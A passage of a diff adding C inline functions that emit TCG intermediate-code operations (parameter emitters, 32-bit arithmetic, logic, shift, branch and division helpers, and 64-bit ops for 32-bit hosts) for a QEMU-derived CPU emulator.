TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op5i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op5ii_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, + TCGv_i32 arg2, TCGv_i32 arg3, + TCGArg arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = arg4; + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op5ii_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, + TCGv_i64 arg2, TCGv_i64 arg3, + TCGArg arg4, TCGArg arg5) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = arg4; + *s->gen_opparam_ptr++ = arg5; +} + +static inline void tcg_gen_op6_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, TCGv_i32 arg5, + TCGv_i32 arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg5); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg6); +} + +static inline void tcg_gen_op6_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, TCGv_i64 arg5, + TCGv_i64 arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg5); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg6); +} + +static inline void tcg_gen_op6i_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, TCGv_i32 arg2, + TCGv_i32 arg3, TCGv_i32 arg4, + TCGv_i32 arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg5); + *s->gen_opparam_ptr++ = arg6; +} + +static inline void tcg_gen_op6i_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, TCGv_i64 arg2, + TCGv_i64 arg3, TCGv_i64 arg4, + TCGv_i64 arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg5); + *s->gen_opparam_ptr++ = arg6; +} + +static inline void tcg_gen_op6ii_i32(TCGContext *s, TCGOpcode opc, TCGv_i32 arg1, + TCGv_i32 arg2, TCGv_i32 arg3, + TCGv_i32 arg4, TCGArg arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I32(arg4); + *s->gen_opparam_ptr++ = arg5; + *s->gen_opparam_ptr++ = arg6; +} + +static inline void tcg_gen_op6ii_i64(TCGContext *s, TCGOpcode opc, TCGv_i64 arg1, + TCGv_i64 arg2, TCGv_i64 arg3, + TCGv_i64 arg4, TCGArg arg5, TCGArg arg6) +{ + *s->gen_opc_ptr++ = opc; + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg1); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg2); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg3); + *s->gen_opparam_ptr++ = GET_TCGV_I64(arg4); + *s->gen_opparam_ptr++ = arg5; + *s->gen_opparam_ptr++ = arg6; +} + +static inline void tcg_add_param_i32(TCGContext *s, TCGv_i32 val) +{ + *s->gen_opparam_ptr++ = GET_TCGV_I32(val); +} + +static inline void tcg_add_param_i64(TCGContext *s, TCGv_i64 val) +{ +#if TCG_TARGET_REG_BITS == 32 + *s->gen_opparam_ptr++ = GET_TCGV_I32(TCGV_LOW(val)); + *s->gen_opparam_ptr++ = GET_TCGV_I32(TCGV_HIGH(val)); +#else + *s->gen_opparam_ptr++ = GET_TCGV_I64(val); +#endif +} + +static inline void gen_set_label(TCGContext *s, int n) +{ + tcg_gen_op1i(s, INDEX_op_set_label, n); +} + +static inline void tcg_gen_br(TCGContext *s, int label) +{ + tcg_gen_op1i(s, INDEX_op_br, label); +} + +static inline void tcg_gen_mov_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg) +{ + if (!TCGV_EQUAL_I32(ret, arg)) + tcg_gen_op2_i32(s, INDEX_op_mov_i32, ret, arg); +} + +static inline void tcg_gen_movi_i32(TCGContext *s, TCGv_i32 ret, int32_t arg) +{ + tcg_gen_op2i_i32(s, INDEX_op_movi_i32, ret, arg); +} + +/* 32 bit ops */ + +static inline void tcg_gen_ld8u_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld8u_i32, ret, arg2, offset); +} + +static inline void tcg_gen_ld8s_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld8s_i32, ret, arg2, offset); +} + +static inline void tcg_gen_ld16u_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld16u_i32, ret, arg2, offset); +} + +static inline void tcg_gen_ld16s_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld16s_i32, ret, arg2, offset); +} + +static inline void tcg_gen_ld_i32(TCGContext *s, TCGv_i32 ret, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_ld_i32, ret, arg2, offset); +} + +static inline void tcg_gen_st8_i32(TCGContext *s, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_st8_i32, arg1, arg2, offset); +} + +static inline void tcg_gen_st16_i32(TCGContext *s, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_st16_i32, arg1, arg2, offset); +} + +static inline void tcg_gen_st_i32(TCGContext *s, TCGv_i32 arg1, TCGv_ptr arg2, tcg_target_long offset) +{ + tcg_gen_ldst_op_i32(s, INDEX_op_st_i32, arg1, arg2, offset); +} + +static inline void tcg_gen_add_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_add_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_addi_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_add_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_sub_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_sub_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_subfi_i32(TCGContext *s, TCGv_i32 ret, int32_t arg1, TCGv_i32 arg2) +{ + TCGv_i32 t0 = tcg_const_i32(s, arg1); + tcg_gen_sub_i32(s, ret, t0, arg2); + tcg_temp_free_i32(s, t0); +} + +static inline void tcg_gen_subi_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* some cases can be optimized here */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_sub_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_and_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCGV_EQUAL_I32(arg1, arg2)) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + tcg_gen_op3_i32(s, INDEX_op_and_i32, ret, arg1, arg2); + } +} + +static inline void tcg_gen_andi_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2) +{ + TCGv_i32 t0; + /* Some cases can be optimized here. */ + switch (arg2) { + case 0: + tcg_gen_movi_i32(s, ret, 0); + return; + case 0xffffffffu: + tcg_gen_mov_i32(s, ret, arg1); + return; + case 0xffu: + /* Don't recurse with tcg_gen_ext8u_i32. */ + if (TCG_TARGET_HAS_ext8u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext8u_i32, ret, arg1); + return; + } + break; + case 0xffffu: + if (TCG_TARGET_HAS_ext16u_i32) { + tcg_gen_op2_i32(s, INDEX_op_ext16u_i32, ret, arg1); + return; + } + break; + } + t0 = tcg_const_i32(s, arg2); + tcg_gen_and_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); +} + +static inline void tcg_gen_or_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCGV_EQUAL_I32(arg1, arg2)) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + tcg_gen_op3_i32(s, INDEX_op_or_i32, ret, arg1, arg2); + } +} + +static inline void tcg_gen_ori_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* Some cases can be optimized here. */ + if (arg2 == -1) { + tcg_gen_movi_i32(s, ret, -1); + } else if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_or_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_xor_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCGV_EQUAL_I32(arg1, arg2)) { + tcg_gen_movi_i32(s, ret, 0); + } else { + tcg_gen_op3_i32(s, INDEX_op_xor_i32, ret, arg1, arg2); + } +} + +static inline void tcg_gen_xori_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + /* Some cases can be optimized here. */ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else if (arg2 == -1 && TCG_TARGET_HAS_not_i32) { + /* Don't recurse with tcg_gen_not_i32. */ + tcg_gen_op2_i32(s, INDEX_op_not_i32, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_xor_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_shl_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_shl_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_shli_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_shl_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_shr_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_shr_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_shri_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_shr_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_sar_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_sar_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_sari_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + if (arg2 == 0) { + tcg_gen_mov_i32(s, ret, arg1); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_sar_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_brcond_i32(TCGContext *s, TCGCond cond, TCGv_i32 arg1, + TCGv_i32 arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + tcg_gen_op4ii_i32(s, INDEX_op_brcond_i32, arg1, arg2, cond, label_index); + } +} + +static inline void tcg_gen_brcondi_i32(TCGContext *s, TCGCond cond, TCGv_i32 arg1, + int32_t arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_brcond_i32(s, cond, arg1, t0, label_index); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_setcond_i32(TCGContext *s, TCGCond cond, TCGv_i32 ret, + TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i32(s, ret, 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i32(s, ret, 0); + } else { + tcg_gen_op4i_i32(s, INDEX_op_setcond_i32, ret, arg1, arg2, cond); + } +} + +static inline void tcg_gen_setcondi_i32(TCGContext *s, TCGCond cond, TCGv_i32 ret, + TCGv_i32 arg1, int32_t arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i32(s, ret, 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i32(s, ret, 0); + } else { + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_setcond_i32(s, cond, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } +} + +static inline void tcg_gen_mul_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + tcg_gen_op3_i32(s, INDEX_op_mul_i32, ret, arg1, arg2); +} + +static inline void tcg_gen_muli_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) +{ + TCGv_i32 t0 = tcg_const_i32(s, arg2); + tcg_gen_mul_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); +} + +static inline void tcg_gen_div_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_div_i32) { + tcg_gen_op3_i32(s, INDEX_op_div_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_sari_i32(s, t0, arg1, 31); + tcg_gen_op5_i32(s, INDEX_op_div2_i32, ret, t0, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_div_i32(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_rem_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rem_i32) { + tcg_gen_op3_i32(s, INDEX_op_rem_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_div_i32, t0, arg1, arg2); + tcg_gen_mul_i32(s, t0, t0, arg2); + tcg_gen_sub_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_sari_i32(s, t0, arg1, 31); + tcg_gen_op5_i32(s, INDEX_op_div2_i32, t0, ret, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_rem_i32(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_divu_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_div_i32) { + tcg_gen_op3_i32(s, INDEX_op_divu_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_movi_i32(s, t0, 0); + tcg_gen_op5_i32(s, INDEX_op_divu2_i32, ret, t0, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_divu_i32(s, ret, arg1, arg2); + } +} + +static inline void tcg_gen_remu_i32(TCGContext *s, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) +{ + if (TCG_TARGET_HAS_rem_i32) { + tcg_gen_op3_i32(s, INDEX_op_remu_i32, ret, arg1, arg2); + } else if (TCG_TARGET_HAS_div_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_op3_i32(s, INDEX_op_divu_i32, t0, arg1, arg2); + tcg_gen_mul_i32(s, t0, t0, arg2); + tcg_gen_sub_i32(s, ret, arg1, t0); + tcg_temp_free_i32(s, t0); + } else if (TCG_TARGET_HAS_div2_i32) { + TCGv_i32 t0 = tcg_temp_new_i32(s); + tcg_gen_movi_i32(s, t0, 0); + tcg_gen_op5_i32(s, INDEX_op_divu2_i32, t0, ret, arg1, t0, arg2); + tcg_temp_free_i32(s, t0); + } else { + gen_helper_remu_i32(s, ret, arg1, arg2); + } +} + +#if TCG_TARGET_REG_BITS == 32 + +static inline void tcg_gen_mov_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg) +{ + if (!TCGV_EQUAL_I64(ret, arg)) { + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg)); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg)); + } +} + +static inline void tcg_gen_movi_i64(TCGContext *s, TCGv_i64 ret, int64_t arg) +{ + tcg_gen_movi_i32(s, TCGV_LOW(ret), (int32_t)arg); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), arg >> 32); +} + +static inline void tcg_gen_ld8u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld8u_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ld8s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld8s_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_HIGH(ret), 31); +} + +static inline void tcg_gen_ld16u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld16u_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ld16s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld16s_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ld32u_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_ld32s_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_LOW(ret), 31); +} + +static inline void tcg_gen_ld_i64(TCGContext *s, TCGv_i64 ret, TCGv_ptr arg2, + tcg_target_long offset) +{ + /* since arg2 and ret have different types, they cannot be the + same temporary */ +#ifdef HOST_WORDS_BIGENDIAN + tcg_gen_ld_i32(s, TCGV_HIGH(ret), arg2, offset); + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset + 4); +#else + tcg_gen_ld_i32(s, TCGV_LOW(ret), arg2, offset); + tcg_gen_ld_i32(s, TCGV_HIGH(ret), arg2, offset + 4); +#endif +} + +static inline void tcg_gen_st8_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_st8_i32(s, TCGV_LOW(arg1), arg2, offset); +} + +static inline void tcg_gen_st16_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_st16_i32(s, TCGV_LOW(arg1), arg2, offset); +} + +static inline void tcg_gen_st32_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ + tcg_gen_st_i32(s, TCGV_LOW(arg1), arg2, offset); +} + +static inline void tcg_gen_st_i64(TCGContext *s, TCGv_i64 arg1, TCGv_ptr arg2, + tcg_target_long offset) +{ +#ifdef HOST_WORDS_BIGENDIAN + tcg_gen_st_i32(s, TCGV_HIGH(arg1), arg2, offset); + tcg_gen_st_i32(s, TCGV_LOW(arg1), arg2, offset + 4); +#else + tcg_gen_st_i32(s, TCGV_LOW(arg1), arg2, offset); + tcg_gen_st_i32(s, TCGV_HIGH(arg1), arg2, offset + 4); +#endif +} + +static inline void tcg_gen_add_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op6_i32(s, INDEX_op_add2_i32, TCGV_LOW(ret), TCGV_HIGH(ret), + TCGV_LOW(arg1), TCGV_HIGH(arg1), TCGV_LOW(arg2), + TCGV_HIGH(arg2)); + /* Allow the optimizer room to replace add2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); +} + +static inline void tcg_gen_sub_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_op6_i32(s, INDEX_op_sub2_i32, TCGV_LOW(ret), TCGV_HIGH(ret), + TCGV_LOW(arg1), TCGV_HIGH(arg1), TCGV_LOW(arg2), + TCGV_HIGH(arg2)); + /* Allow the optimizer room to replace sub2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); +} + +static inline void tcg_gen_and_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_and_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_and_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +} + +static inline void tcg_gen_andi_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_andi_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), (uint32_t)arg2); + tcg_gen_andi_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), arg2 >> 32); +} + +static inline void tcg_gen_or_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_or_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_or_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +} + +static inline void tcg_gen_ori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_ori_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), (uint32_t)arg2); + tcg_gen_ori_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), arg2 >> 32); +} + +static inline void tcg_gen_xor_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + tcg_gen_xor_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_xor_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), TCGV_HIGH(arg2)); +} + +static inline void tcg_gen_xori_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_xori_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), (int32_t)arg2); + tcg_gen_xori_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), arg2 >> 32); +} + +/* XXX: use generic code when basic block handling is OK or CPU + specific code (x86) */ +static inline void tcg_gen_shl_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_shl_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_shli_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_shifti_i64(s, ret, arg1, (int)arg2, 0, 0); +} + +static inline void tcg_gen_shr_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_shr_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_shri_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_shifti_i64(s, ret, arg1, (int)arg2, 1, 0); +} + +static inline void tcg_gen_sar_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + gen_helper_sar_i64(s, ret, arg1, arg2); +} + +static inline void tcg_gen_sari_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) +{ + tcg_gen_shifti_i64(s, ret, arg1, (int)arg2, 1, 1); +} + +static inline void tcg_gen_brcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 arg1, + TCGv_i64 arg2, int label_index) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_br(s, label_index); + } else if (cond != TCG_COND_NEVER) { + tcg_gen_op6ii_i32(s, INDEX_op_brcond2_i32, + TCGV_LOW(arg1), TCGV_HIGH(arg1), TCGV_LOW(arg2), + TCGV_HIGH(arg2), cond, label_index); + } +} + +static inline void tcg_gen_setcond_i64(TCGContext *s, TCGCond cond, TCGv_i64 ret, + TCGv_i64 arg1, TCGv_i64 arg2) +{ + if (cond == TCG_COND_ALWAYS) { + tcg_gen_movi_i32(s, TCGV_LOW(ret), 1); + } else if (cond == TCG_COND_NEVER) { + tcg_gen_movi_i32(s, TCGV_LOW(ret), 0); + } else { + tcg_gen_op6i_i32(s, INDEX_op_setcond2_i32, TCGV_LOW(ret), + TCGV_LOW(arg1), TCGV_HIGH(arg1), + TCGV_LOW(arg2), TCGV_HIGH(arg2), cond); + } + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); +} + +static inline void tcg_gen_mul_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) +{ + TCGv_i64 t0; + TCGv_i32 t1; + + t0 = tcg_temp_new_i64(s); + t1 = tcg_temp_new_i32(s); + + if (TCG_TARGET_HAS_mulu2_i32) { + tcg_gen_op4_i32(s, INDEX_op_mulu2_i32, TCGV_LOW(t0), TCGV_HIGH(t0), + TCGV_LOW(arg1), TCGV_LOW(arg2)); + /* Allow the optimizer room to replace mulu2 with two moves. */ + tcg_gen_op0(s, INDEX_op_nop); + } else { + tcg_debug_assert(TCG_TARGET_HAS_muluh_i32); + tcg_gen_op3_i32(s, INDEX_op_mul_i32, TCGV_LOW(t0), + TCGV_LOW(arg1), TCGV_LOW(arg2)); + tcg_gen_op3_i32(s, INDEX_op_muluh_i32, 